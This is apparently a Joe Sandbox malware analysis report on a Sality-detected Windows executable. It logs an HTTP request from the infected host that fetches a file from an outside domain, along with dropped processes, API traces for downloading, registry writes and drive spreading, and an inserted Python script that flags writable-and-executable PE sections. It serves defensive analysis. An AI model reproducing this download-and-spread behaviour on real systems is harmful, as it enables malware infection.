                               Jul 5, 2024 08:00:11.618431091 CEST | 403 | IN | HTTP/1.1 404 Not Found
                              Date: Fri, 05 Jul 2024 06:00:11 GMT
                              Server: Apache
                              Content-Length: 258
                              Content-Type: text/html; charset=iso-8859-1
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               10 | 192.168.2.6 | 49726 | 37.230.104.89 | 80 | 5352 | C:\Users\user\Desktop\1.0.0.2.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Jul 5, 2024 08:00:11.733848095 CEST | 202 | OUT | GET /images/xs2.jpg?f4c967=160423430 HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                              Host: ampyazilim.com.tr
                              Cache-Control: no-cache
                               Jul 5, 2024 08:00:12.479939938 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                              Connection: Keep-Alive
                              Keep-Alive: timeout=5, max=100
                              content-type: text/html
                              content-length: 707
                              date: Fri, 05 Jul 2024 06:00:12 GMT
                              location: http://ampyazilim.com.tr/images/xs2.jpg?1
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>



                              Target ID:0
                              Start time:02:00:00
                              Start date:05/07/2024
                              Path:C:\Users\user\Desktop\1.0.0.2.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\1.0.0.2.exe"
                              Imagebase:0x400000
                              File size:5'242'880 bytes
                              MD5 hash:AD809738E208D99A28009023546BC695
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Sality, Description: Yara detected Sality, Source: 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Target ID:2
                              Start time:02:00:00
                              Start date:05/07/2024
                              Path:C:\Users\user\AppData\Local\Temp\rksowY.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Local\Temp\rksowY.exe
                              Imagebase:0x5b0000
                              File size:15'872 bytes
                              MD5 hash:56B2C3810DBA2E939A8BB9FA36D3CF96
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 100%, ReversingLabs
                              Reputation:moderate
                              Has exited:true

                              Target ID:3
                              Start time:02:00:00
                              Start date:05/07/2024
                              Path:C:\Windows\System32\fontdrvhost.exe
                              Wow64 process (32bit):false
                              Commandline:"fontdrvhost.exe"
                              Imagebase:0x7ff7d9200000
                              File size:827'408 bytes
                              MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:false

                              Target ID:6
                              Start time:02:00:01
                              Start date:05/07/2024
                              Path:C:\Windows\System32\fontdrvhost.exe
                              Wow64 process (32bit):false
                              Commandline:"fontdrvhost.exe"
                              Imagebase:0x7ff7d9200000
                              File size:827'408 bytes
                              MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:false

                              Target ID:7
                              Start time:02:00:01
                              Start date:05/07/2024
                              Path:C:\Windows\System32\dwm.exe
                              Wow64 process (32bit):false
                              Commandline:"dwm.exe"
                              Imagebase:0x7ff68eb30000
                              File size:94'720 bytes
                              MD5 hash:5C27608411832C5B39BA04E33D53536C
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:false

                              Target ID:13
                              Start time:02:00:08
                              Start date:05/07/2024
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1328
                              Imagebase:0x970000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true


                                Execution Graph

                                Execution Coverage:21.2%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:23%
                                Total number of Nodes:508
                                Total number of Limit Nodes:37
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: 2$M$$P$PE$d$d
                                • API String ID: 0-3739350137
                                • Opcode ID: 1e5895689fe20b0ab398a40cf996b4e98c83d48457c9256e4d543ae30d8914bc
                                • Instruction ID: 62470d2a5f7bfc6eeeb6d0fa0e592f169c7e213b4a76dc5353113a1f1fe8d217
                                • Opcode Fuzzy Hash: 1e5895689fe20b0ab398a40cf996b4e98c83d48457c9256e4d543ae30d8914bc
                                • Instruction Fuzzy Hash: 3B2317B5D01618DFDB24CF54CC94BE9B7B6FB88305F1881E9E10AAB280D735AA85CF54

                                Control-flow Graph

                                APIs
                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00D63223
                                • WriteFile.KERNEL32(00000000,FFFE75FF,00003E00,?,00000000), ref: 00D63252
                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 00D63256
                                • WinExec.KERNEL32(?,00000005), ref: 00D63262
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2264312389.0000000000D60000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2264290428.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000828000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000C69000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000CB5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000CC3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000D28000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000D37000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2265367690.0000000000D64000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2265367690.0000000000D68000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2265442991.0000000000D69000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2265442991.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2265490780.0000000000D79000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                Similarity
                                • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                                • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul$rksowY.exe
                                • API String ID: 2234911746-1163582672
                                • Opcode ID: 8f3ea90cbcb633ce9332640cb04b9dc4a5121c3cef332d4cc1253c7b04e2b282
                                • Instruction ID: 27a8bb7e22d2164f5506e8f79079f342a779db44aff727a9ac46c4d19378f2d5
                                • Opcode Fuzzy Hash: 8f3ea90cbcb633ce9332640cb04b9dc4a5121c3cef332d4cc1253c7b04e2b282
                                • Instruction Fuzzy Hash: 14611974D01215DBCF24CF94C884AADF7B0FF4A715F2982AAD446AB201C7799F81CBA5

                                Control-flow Graph

                                APIs
                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 02B6D257
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: ChangeCloseFindNotification
                                • String ID: P
                                • API String ID: 2591292051-3110715001
                                • Opcode ID: 5bd34bad6d46300d01cf92a4bd4002ab2240cc2a9ade430f6608d4c591fcced3
                                • Instruction ID: e3a5360f04303c6b6a6bd605f351c51bc81d1805972e484e2745533f65906fd4
                                • Opcode Fuzzy Hash: 5bd34bad6d46300d01cf92a4bd4002ab2240cc2a9ade430f6608d4c591fcced3
                                • Instruction Fuzzy Hash: A4F14B71E40219EBEB24DBA4CC4CBE97774FB48754F104AD9E266AB1C0C7B89A84CF50

                                Control-flow Graph (legend: Executed / Not Executed)
                                • Function 02B6BADD, blocks 02B6BADD-02B6BE88; calls: Sleep (x2), sub 02B642C7 (x2), FindFirstFileA, FindNextFileA, sub 02B65719, sub 02B69652, and itself (02B6BADD) from inside the FindFirstFileA/FindNextFileA enumeration.
                                APIs
                                • Sleep.KERNEL32(?,?,?,?,00000000,Function_00013630,02BE0240,000000FF,?,02B6CB1B,00000003,00000000,00000000,00000000), ref: 02B6BB57
                                • FindFirstFileA.KERNEL32(?,?), ref: 02B6BBED
                                • FindNextFileA.KERNELBASE(000000FF,?), ref: 02B6BC11
                                • Sleep.KERNEL32(00000400), ref: 02B6BE70
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: FileFindSleep$FirstNext
                                • String ID: c:\windows$d
                                • API String ID: 151579152-1584695526
                                • Opcode ID: 530d2877282de9edb3c16f3ab993db69166e58e67feb93742613cbe4ae85bfda
                                • Instruction ID: 24d7cbc265cd769eba603f272cb6ec53508d47dbfe92bb1efc6f55a88cba282a
                                • Opcode Fuzzy Hash: 530d2877282de9edb3c16f3ab993db69166e58e67feb93742613cbe4ae85bfda
                                • Instruction Fuzzy Hash: 45B15CB1A00209DBCF14DF68D898BAE77B5EF48349F148998F919EB241C738D951CF54

                                Control-flow Graph (legend: Executed / Not Executed)
                                • Function 02B6B888, blocks 02B6B888-02B6BADC; calls: sub 02B65B02, InternetOpenA, InternetOpenUrlA, CreateFileA, InternetReadFile, WriteFile, sub 02B72CEB, InternetCloseHandle (x2).
                                APIs
                                • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02B6B95B
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 02B6B98D
                                • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 02B6B9C2
                                • InternetReadFile.WININET(00000000,00000000,00000400,00000000), ref: 02B6B9E8
                                • WriteFile.KERNEL32(000000FF,00000000,00000000,00000104,00000000), ref: 02B6BA30
                                • InternetCloseHandle.WININET(00000000), ref: 02B6BAB6
                                • InternetCloseHandle.WININET(00000000), ref: 02B6BACC
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Internet$File$CloseHandleOpen$CreateReadWrite
                                • String ID:
                                • API String ID: 4000607406-0
                                • Opcode ID: 25016f7ed928ba5e53e6f634da93bd9ac49e584d27d600ddbf666186d3cf679e
                                • Instruction ID: b696699c86f7c2b0c2f7f9027982f702d49ddc5a41e08d869b6d37c3ab41df55
                                • Opcode Fuzzy Hash: 25016f7ed928ba5e53e6f634da93bd9ac49e584d27d600ddbf666186d3cf679e
                                • Instruction Fuzzy Hash: 8B510871A4061CEBDB34CF58CC48BEAB775EB4430AF0485D8E259A6280DBB95BD8CF51

                                Control-flow Graph (legend: Executed / Not Executed)
                                • Function 02B61B0E, blocks 02B61B0E-02B622B3; calls: sub 02B73600, GetUserNameA, RegOpenKeyExA, RegCreateKeyA, GlobalAlloc, GlobalFree, subs 02B72CEB (several), 02B67C71, 02B62399, 02B6169B, 02B616FD.
                                APIs
                                • GetUserNameA.ADVAPI32(00000000,?), ref: 02B61BEA
                                • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 02B61CF5
                                • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 02B61D16
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: CreateNameOpenUser
                                • String ID:
                                • API String ID: 3417583755-0
                                • Opcode ID: 6ddf8deee7a18f457f160b95f16d3b7ead8b5ae669deb4d4dc70b6671fe10c5c
                                • Instruction ID: 15c042773bb58c7f8d70e22f1bfa7acc98d16da5d5217ca4c80e0e86692ed428
                                • Opcode Fuzzy Hash: 6ddf8deee7a18f457f160b95f16d3b7ead8b5ae669deb4d4dc70b6671fe10c5c
                                • Instruction Fuzzy Hash: 42123B75D04A18DFDB24DF54CC88BEAB7B9BF84306F0486D9E50AAE280D7749A84CF51

                                Control-flow Graph (legend: Executed / Not Executed)
                                • Function 02BEBCD0, blocks 02BEBCD0-02BEBEB2; calls: LoadLibraryA, GetProcAddress, ExitProcess, VirtualProtect (x2).
                                APIs
                                • LoadLibraryA.KERNEL32(?), ref: 02BEBE12
                                • GetProcAddress.KERNEL32(?,02BE8FF9), ref: 02BEBE30
                                • ExitProcess.KERNEL32(?,02BE8FF9), ref: 02BEBE41
                                • VirtualProtect.KERNEL32(02B60000,00001000,00000004,?,00000000), ref: 02BEBE8F
                                • VirtualProtect.KERNEL32(02B60000,00001000), ref: 02BEBEA4
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                • String ID:
                                • API String ID: 1996367037-0
                                • Opcode ID: 4049932ffb759a96558e0a6d3fac7f5dc0b11330b65e6274c8e02ea1419c0ba3
                                • Instruction ID: b30ebdf15e03e413193b23b41245a3b46ea9b1c1681d58f73065bceb650542b4
                                • Opcode Fuzzy Hash: 4049932ffb759a96558e0a6d3fac7f5dc0b11330b65e6274c8e02ea1419c0ba3
                                • Instruction Fuzzy Hash: BB5105726446528BDF215AB8DCC07B8B7A4FB4122C7184BB8D6E7C73C6EBA45806C760
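
The function at 02BEBCD0 lives in the second dumped region (02BE9000) and behaves like an unpacking stub: it loops over LoadLibraryA and GetProcAddress to rebuild imports, with an ExitProcess branch directly after GetProcAddress, and it calls VirtualProtect on the first page of the image at 02B60000 with protection 0x4 (PAGE_READWRITE) before a second VirtualProtect on the same page whose remaining arguments the report did not recover. An image that has been through such a stub commonly ends up with a code section whose section characteristics are writable as well as executable. The block below is an added example, not code from the report, the sample or Joe Sandbox: a pure-Python reader of the PE section table that flags such sections. The PE bytes it runs on are constructed (header only, no code) and are not taken from this sample; the constant names are the Winnt.h IMAGE_SCN_* flags.

```python
"""Flag PE sections that are both writable and executable.

Added example, not code from the report or from Joe Sandbox. It parses only
the section table (DOS header -> PE signature -> COFF header -> section
headers); the image it is run on below is constructed, not this sample.
"""
import struct

IMAGE_SCN_CNT_CODE    = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ    = 0x40000000
IMAGE_SCN_MEM_WRITE   = 0x80000000


def section_table(data: bytes):
    """Yield (name, VirtualAddress, VirtualSize, Characteristics) per section header."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                              # IMAGE_FILE_HEADER (20 bytes)
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]
    first = coff + 20 + size_of_optional             # section headers follow the optional header
    for i in range(num_sections):
        off = first + 40 * i                         # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, vaddr = struct.unpack_from("<8sII", data, off)
        characteristics = struct.unpack_from("<I", data, off + 36)[0]
        yield name.rstrip(b"\0").decode("ascii", "replace"), vaddr, vsize, characteristics


def writable_code_sections(data: bytes) -> list:
    """Names of sections marked writable and executable (or writable code content)."""
    exec_bits = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE
    return [name for name, _, _, c in section_table(data)
            if c & IMAGE_SCN_MEM_WRITE and c & exec_bits]


def build_sample_image(sections) -> bytes:
    """Constructed PE32 header with no code: DOS stub, signature, COFF and optional
    headers, then one section header per (name, characteristics) pair."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    size_of_optional = 0xE0                          # PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_of_optional, 0x102)
    optional = struct.pack("<H", 0x10B) + b"\0" * (size_of_optional - 2)
    headers = b""
    for i, (name, characteristics) in enumerate(sections):
        headers += struct.pack("<8sIIIIIIHHI", name, 0x1000, 0x1000 * (i + 1),
                               0x1000, 0x400 * (i + 1), 0, 0, 0, 0, characteristics)
    return dos + b"PE\0\0" + coff + optional + headers


NORMAL_TEXT = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ   # 0x60000020
WRITABLE_TEXT = NORMAL_TEXT | IMAGE_SCN_MEM_WRITE                                 # 0xE0000020
DATA = 0x00000040 | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE                      # 0xC0000040

# Constructed image: a writable .text next to an ordinary .data section.
SAMPLE_IMAGE = build_sample_image([(b".text", WRITABLE_TEXT), (b".data", DATA)])

if __name__ == "__main__":
    print(writable_code_sections(SAMPLE_IMAGE))     # ['.text']
```

Run it against the memory dump files listed under Memory Dump Source rather than the original file on disk: the section rights a packer rewrites at run time only show in the dumped image. A dumped image may also have raw offsets equal to virtual addresses, which is why the reader above uses only the section header fields and never reads section contents.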
                                APIs
                                • socket.WS2_32(00000002,00000002,00000000), ref: 02B639F0
                                • setsockopt.WS2_32(?,0000FFFF,00001002,00100000,00000004), ref: 02B63A2E
                                • bind.WS2_32(?,00000002,00000010), ref: 02B63A44
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: bindsetsockoptsocket
                                • String ID:
                                • API String ID: 3947658864-0
                                • Opcode ID: 00a5c07dd6d4fde2ef3386e0807b931ffbc980fcc65a04ad5244a833a6f69504
                                • Instruction ID: 8cdbe9e0702511c2125f0ccd2a45f382b5d21e4bf40e2861f82e099cc7af29bf
                                • Opcode Fuzzy Hash: 00a5c07dd6d4fde2ef3386e0807b931ffbc980fcc65a04ad5244a833a6f69504
                                • Instruction Fuzzy Hash: FA51F974D402A8EBEB34DF54CD49BE9B7B4AB08741F0085D9E289BA280D7F85AC48F15
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,00000000), ref: 02B658AE
                                • FindNextFileA.KERNELBASE(000000FF,00000000), ref: 02B658D5
                                • Sleep.KERNEL32(00000100), ref: 02B6599E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: FileFind$FirstNextSleep
                                • String ID:
                                • API String ID: 2635277345-0
                                • Opcode ID: 4c12d6f3662347bfe566c9af4d1a360802217f2b29b3515e17cb44e946e8b8ad
                                • Instruction ID: 50c63e8c8806ad82831309dd7ae6f1175beb22c927b6e805e90c3930a12c7dfb
                                • Opcode Fuzzy Hash: 4c12d6f3662347bfe566c9af4d1a360802217f2b29b3515e17cb44e946e8b8ad
                                • Instruction Fuzzy Hash: C6515D71900218DBDF75DBA4DC48BEE7779AB44309F4049E8E20EAA180DB74ABD4CF51
                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02B6D4B3
                                • FindCloseChangeNotification.KERNEL32(?), ref: 02B6D4DF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: ChangeCloseCreateFindMutexNotification
                                • String ID:
                                • API String ID: 2967213129-0
                                • Opcode ID: e1a4e3bea40d29e8138a8d915f500402d994940cba178ad39b6cf8fccecbf403
                                • Instruction ID: 7481c9e639e95ce03310e721a5441432a0629991dee16742b74f74841e32935a
                                • Opcode Fuzzy Hash: e1a4e3bea40d29e8138a8d915f500402d994940cba178ad39b6cf8fccecbf403
                                • Instruction Fuzzy Hash: 2C512CB5D40218DBDF24EBA0DC8CBE97779AB58301F008DD9E649AA140DBB89AD4CF51

                                Control-flow Graph (legend: Executed / Not Executed)
                                • Function 02B6DD99, blocks 02B6DD99-02B6E504; calls: Sleep (x3), CreateFileA (x4), WriteFile (x3), ReadFile, FindCloseChangeNotification (x2), GetLogicalDrives, GetDriveTypeA, GetFileAttributesA (x2), SetFileAttributesA (x2), SetFileTime, subs 02B73600, 02B613E8 (x2), 02B65BE5, 02B69652, 02B6DC56, 02B65758, 02B65618, 02B6D928, 02B61000, 02B642C7.
                                APIs
                                • Sleep.KERNEL32 ref: 02B6DEAD
                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 02B6DED8
                                • WriteFile.KERNEL32(000000FF,02BE2300,000002E5,?,00000000), ref: 02B6DF07
                                • FindCloseChangeNotification.KERNEL32(000000FF), ref: 02B6DF14
                                • Sleep.KERNEL32(00004E20), ref: 02B6DF9F
                                • GetLogicalDrives.KERNEL32 ref: 02B6DFAF
                                • GetDriveTypeA.KERNEL32(?), ref: 02B6E032
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 02B6E074
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: File$CreateSleep$ChangeCloseDriveDrivesFindLogicalNotificationTypeWrite
                                • String ID: :$\
                                • API String ID: 2525275916-1166558509
                                • Opcode ID: 8c1dc03068369ea17b6e915bd5c2829e17045b3796667683728e96d745e321f8
                                • Instruction ID: c5eee00d90334488c939ff6a29bcc3bd8a4eddeb3f2308ab3f538172d7227589
                                • Opcode Fuzzy Hash: 8c1dc03068369ea17b6e915bd5c2829e17045b3796667683728e96d745e321f8
                                • Instruction Fuzzy Hash: 71127C75D44258DBDB24DBA4CC88FEAB775AB48300F0449D8E249EB180D7B89AA4CF51
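
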